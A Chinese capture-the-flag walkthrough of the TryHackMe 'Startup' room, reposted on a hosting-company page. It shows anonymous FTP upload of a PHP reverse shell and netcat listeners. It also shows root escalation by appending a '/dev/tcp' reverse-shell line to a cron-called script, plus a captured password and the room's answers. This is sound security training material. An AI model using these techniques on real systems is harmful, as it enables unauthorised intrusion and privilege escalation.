高防服务器
  • 电 话:400-808-5836
  • MSN :huad@live.com
  • 客服QQ:4698328 9291215
  • 咨询邮箱:sales@fobhost.com
  • 售后:services@fobhost.com
  • 网 址:https://www.gaofangfuwuqi.cn/
    • 首页 新闻资讯 新闻资讯 【Tryhackme】Startup(wireshark数据报分析,cron任务提权)

    【Tryhackme】Startup(wireshark数据报分析,cron任务提权)

    免责声明

    本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。

    服务扫描

    root?kali)-[~] └─# nmap -sV -Pn 10.10.171.61                            Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-06 02:51 EDT Nmap scan report for 10.10.171.61 Host is up (0.32s latency). Not shown: 997 closed ports PORT   STATE SERVICE VERSION 21/tcp open  ftp     vsftpd 3.0.3 22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu)) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.61 seconds

    开启了ftp,ssh,http服务

    匿名登录ftp

    ┌──(root?kali)-[~/tryhackme/Startup] └─# ftp 10.10.171.61 Connected to 10.10.171.61. 220 (vsFTPd 3.0.3) Name (10.10.171.61:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -alh 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x    3 65534    65534        4096 Nov 12  2020 . drwxr-xr-x    3 65534    65534        4096 Nov 12  2020 .. -rw-r--r--    1 0        0               5 Nov 12  2020 .test.log drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg -rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt 226 Directory send OK.

    所有文件下载到本地分析,ftp文件夹里面没有任何东西,但是这个文件夹是可写的。

    notice.txt内容

    ┌──(root?kali)-[~/tryhackme/Startup] └─# cat notice.txt  Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.

    maya可能是个ssh用户名?

    important.jpg显示两行文字

    Everybody asks who's the impostor but nobody asks how's the impostor

    没看明白有啥有用的信息。

    渗透80端口

    打开80服务看看,显示一段话:

     No spice here!  Please excuse us as we develop our site. We want to make it the most stylish and convienient way to buy peppers. Plus, we need a web developer. BTW if you're a web developer, contact us. Otherwise, don't you worry. We'll be online shortly!  — Dev Team

    网页源代码里有一行注释:

    when are we gonna update this??

    目录爆破看看

    ┌──(root?kali)-[~/dirsearch] └─# python3 dirsearch.py -e* -t 100 -u http://10.10.171.61                                                                                      _|. _ _  _  _  _ _|_    v0.4.2  (_||| _) (/_(_|| (_| )                                                                      Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492  Output File: /root/dirsearch/reports/10.10.171.61/_21-11-06_03-07-44.txt  Error Log: /root/dirsearch/logs/errors-21-11-06_03-07-44.log  Target: http://10.10.171.61/  [03:07:45] Starting:   [03:08:41] 301 -  312B  - /files  ->  http://10.10.171.61/files/             [03:08:42] 200 -    1KB - /files/                                            [03:08:47] 200 -  808B  - /index.html

    存在一个files文件夹,文件目录显示和ftp上是一样的。那渗透思路就很简单,直接ftp上传webshell到服务器,在web上访问触犯反弹shell,刚才我们已经知道,ftp文件夹是可写的

    ftp上传webshell

    ┌──(root?kali)-[~/tryhackme/Startup] └─# ftp 10.10.171.61 Connected to 10.10.171.61. 220 (vsFTPd 3.0.3) Name (10.10.171.61:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd ftp 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp> put /root/reverse-shell.php ./shell.php local: /root/reverse-shell.php remote: ./shell.php 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 3460 bytes sent in 0.00 secs (28.6932 MB/s)

    触发反弹,拿到webshell

    ┌──(root?kali)-[~/tryhackme/Startup] └─# nc -lnvp 1234                                        listening on [any] 1234 ... connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 46938 Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux  07:14:50 up 24 min,  0 users,  load average: 0.00, 0.01, 0.00 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ whoami www-data

    根目录找到一个文件recipe.txt 

    www-data@startup:/$ cat recipe.txt  cat recipe.txt  Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.

    What is the secret spicy soup recipe?

    love

    横向提权到lennie

    查看home目录,发现存在一个用户:lennie,但是我们没有查看文件夹的权限
    查看/etc/passwd/,发现另一个用户:vagrant

    根目录还有一个文件夹incidents,所有者是www-data,里面有一个文件suspicious.pcapng,传回kali分析

    用wirksharp查看数据包,貌似是上一手黑客的网络交互信息
    在第177个数据片留下了lennie的密码

    c4ntg3t3n0ughsp1c3

    拿到user.txt

    www-data@startup:/tmp$ su lennie su lennie Password: c4ntg3t3n0ughsp1c3  lennie@startup:/tmp$ cd /home cd /home lennie@startup:/home$ ls ls lennie lennie@startup:/home$ cd lennie cd lennie lennie@startup:~$ ls ls Documents  scripts  user.txt

    提权到root

    我们查看scripts文件夹以及里面的脚本

    lennie@startup:~$ cd scripts cd scripts lennie@startup:~/scripts$ ls -alh ls -alh total 16K drwxr-xr-x 2 root   root   4.0K Nov 12  2020 . drwx------ 6 lennie lennie 4.0K Nov  6 08:43 .. -rwxr-xr-x 1 root   root     77 Nov 12  2020 planner.sh -rw-r--r-- 1 root   root      1 Nov  6 08:57 startup_list.txt lennie@startup:~/scripts$ cat planner.sh  cat planner.sh  #!/bin/bash echo $LIST > /home/lennie/scripts/startup_list.txt /etc/print.sh lennie@startup:~/scripts$ cat /etc/print.sh cat /etc/print.sh #!/bin/bash echo "Done!" lennie@startup:~/scripts$ ls -alh /etc/print.sh ls -alh /etc/print.sh -rwx------ 1 lennie lennie 25 Nov 12  2020 /etc/print.sh

    分析

    planner.sh这个文件属于root,按文件名来看属于某种定时任务,普通用户对于这个文件没有写权限。但是这个脚本调用了另一个脚本/etc/print.sh,这个脚本的属组是lennie。也就是说我们可以把反弹shell写进这个脚本

    攻击

    写脚本到/etc/print.sh

    lennie@startup:~/scripts$ echo "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /etc/print.sh <cho "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1" >> /etc/print.sh            lennie@startup:~/scripts$ cat /etc/print.sh cat /etc/print.sh #!/bin/bash echo "Done!" bash -i >& /dev/tcp/10.13.21.169/4242 0>&1

    开启监听,等大约一分钟,拿到root权限

    ┌──(root?kali)-[~/tryhackme/Startup] └─# nc -lnvp 4242                                                                            listening on [any] 4242 ... connect to [10.13.21.169] from (UNKNOWN) [10.10.171.61] 49342 bash: cannot set terminal process group (2909): Inappropriate ioctl for device bash: no job control in this shell root@startup:~# id id uid=0(root) gid=0(root) groups=0(root) root@startup:~# cat /root/root.txt cat /root/root.txt

    [温馨提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。]

    [图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]